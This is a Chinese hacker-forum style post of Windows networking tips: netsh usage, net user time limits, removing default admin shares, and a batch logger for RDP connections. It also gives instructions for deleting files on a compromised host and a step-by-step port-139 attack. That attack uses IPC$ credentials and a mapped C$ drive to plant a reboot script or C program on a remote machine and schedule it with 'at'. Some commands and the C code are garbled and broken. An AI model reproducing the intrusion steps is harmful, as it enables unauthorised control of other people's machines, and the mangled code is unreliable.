网络基础知识大全：[3]3

18）如何查看本机的DNS服务器？

ipconfig其实是可以的（呵呵，上次就介绍过这个命令），除此以外，还可以利用一个道药苍嗓命令：再cmd下输入netsh，进入到netsh>提示符，再输入：int ip 进入到interface ip> 然后再次输入dump，这时候屏幕上出现当前连接的配置情况了

这里必须介绍一下netsh到底是作什么用的！这个命令比较复杂，他包含了很多的子命令，所以这里只对部分命令进行讲解：

1）查看本机IP：首先键入netsh，再netsh>提示符下输入：interface 回车 之后：ip 回车 再之后：show address 回车 这样，就可以看到当前连接的IP地址和子网掩码。（其实这个命令不如ipconfig简单，也不如ipconfig/all全面）

2）修改网络配置：接着上面的命令，我们使用：set address name=“本地连接” source=static addr=192.168.0.200 mask=255.255.255.0，这样就修改了当前的IP地址，用show address来看看（或者用ipconfig）

3）显示一个完整的网络配置教本：

刚才说过，第一个命令显示的信息不如ipconfig/all全面，不用着急，netsh再打印显示网络配置上，还是有自己的特色的！例如：再interface ip>状态下输入：dump，会显示一个清单，显示所有本地连接（不管你是否使用～）与netstat -an不完全一样！

这就是netsh的简单介绍和最基础的用法！希望大家能够掌握！还可以输入？来查看帮助！（要在netsh>提示符下才能查看帮助啊～）

19）肉鸡上的部分文件无法删除，怎么办？

如果对方的文件夹是只读的话，会出现拒绝访问的字样！这时候，我们可以再del命令后面加上/f参数来删除！

20）再说一个可以限制用户登陆时间的命令！

再net命令中就可以实现这样的功能！具体方法如下：

假如我们打算让：coldcrysky这个用户再周日到周易的上午八点到下午四点之间可以登陆，用这个命令：

net user coldcrysky /timesunday-monday,08:00-16:00

之后利用net user coldcrysky命令来查看登陆时间的限制，可以看到是我们所规定的时间（因为是中文的，很容易懂，我就不多废话了）

在此，特别提醒各位：命令中：星期日才是一周的开始！！！不要当成星期一！

光说了怎么设置，如果想恢复回去怎么办呢？（就是恢复成默认状态，任何时间都可以登陆的状态）

看我的：net user coldcrysky /time:all --这样就可以了～

22)如何删除windows2K的默认贡献？

首先打开记事本，输入如下内容：

net share c$ /deletenet share d$ /deletenet share e$ /deletenet share f$ /deletenet share g$ /deletenet share ipc$ /deletenet share admin$ /delete

这里的c$、d$、e$……是代表默认共享的盘符～又几个就设置几个就可以了～

之后点击保存成批处理文件（后缀为：bat的文件！）！加入到启动组中就可以了～

23）139端口的又一用法

呵呵，写这个帖子的原因是因为我答应给一个朋友回复139端口的作用来着……先声明两点：1）不要利用本帖所提到的方法去搞恶意破坏！2）呵呵，可能许多人已经知道了139端口这个用法了～本文只想起到一个抛砖引玉的作用！

废话不多说了～开始：

如果你使用NT主机的话，那你可要注意了！重启NT主机的方法如下：

1：Net use\XXX.XXX.XXX.XXX\ipc$"password" /user:"username"建立一个IPC连接

2：net use H:\XXX.XXX.XXX.XXX\C$将对方的C盘映射为自己的h盘

3：copy c on h:\reboot.batIisreset /rebootCTRL+Z在对方的C盘上生成一个能重启机器的文件

4：net time\XXX.XXX.XXX.XXX得到对方机器时间

5：at\XXX.XXX.XXX.XXX重启的时间 c:\reboot.bat设定对方重启的时间！

6：at\XXX.XXX.XXX.XXX查看任务上面是否添加了这个任务

7：等对方重启好了～

上面的第三步是only for Win2K的，如果是Nt，就需要用意个指定的重启程序，我们可以自己编写一个reboot.exe来代替reboot.bat，代码如下：#include "stdio.h"#include "windows.h"int main(){文件://定义重启的时候发送给所有用户的消息LPSTR msg="Reboot Tool By LionHook\nhttp://www.xici.net";;文件://尝试用最简单的API函数重启if(ExitWindowXXX(EWX_REBOOT.0))return TRUE;if(ExitWindowXXX(EWX_REBOOT | EWX_FORCE,0))return TRUE;文件://因为上面的重启不成功，所以需要调整本进程的特权HANDLE hToken;TOKEN_PRIVILEGES tkp;if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES |TOKEN_QUERY,&hToken)) return FALSE;文件://获取重启的特权 SE_SHUTDOWN_NAMELookupPrivilegevalues(NULL,SE_SHUTDOWN_NAME,&tkp.Privileges[0].Luid);tkp.PrivilegeCount=1;tkp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;AdjustTokenPrivileges(hToken,FALSE,&tkp,0,(POTKEN_PRIVILEGES)NULL,0);文件://判断是NT内核还是9X内核，选择用不同的方式if(!GetVersion()& 0x80000000))InitiateSystemShutdown(NULL,msg,20,TRUE,TRUE);else if (!ExitWindowXXX(EWX_REBOOT,0))if(!ExitWindowXXX(EWX_REBOOT|EWX_FORCE,0))return FALSE;return TRUE;

对了，再次说明啊，别用本文提到的方法搞破坏，小心警察叔叔打PP～呵呵

24）利用批处理文件来建立一个记录3389登陆者信息的记录器

由于Terminal Service默认是没有日志记录的，只能依靠他的系统日志，但是系统日志只能记录一些大动作（开启或停止服务），那么，如何用批处理文件来编写一个将是3389端口的程序呢？很简单：

建立一个批处理文件：内容如下：

@echo offdate/t >> c:\3389log.txt:TS3389time/t >> c:\3389log.txtnetstat -an | find "3389" |find "ESTABLISHED" >>c:\3389log.txtgoto :TS3389

之后保存！

如果有人用你的3389登陆你的机器，呵呵，在c盘下就有3389log.txt这个文件！记录了当天日志，还有连接时间……资料～开始反击～呵呵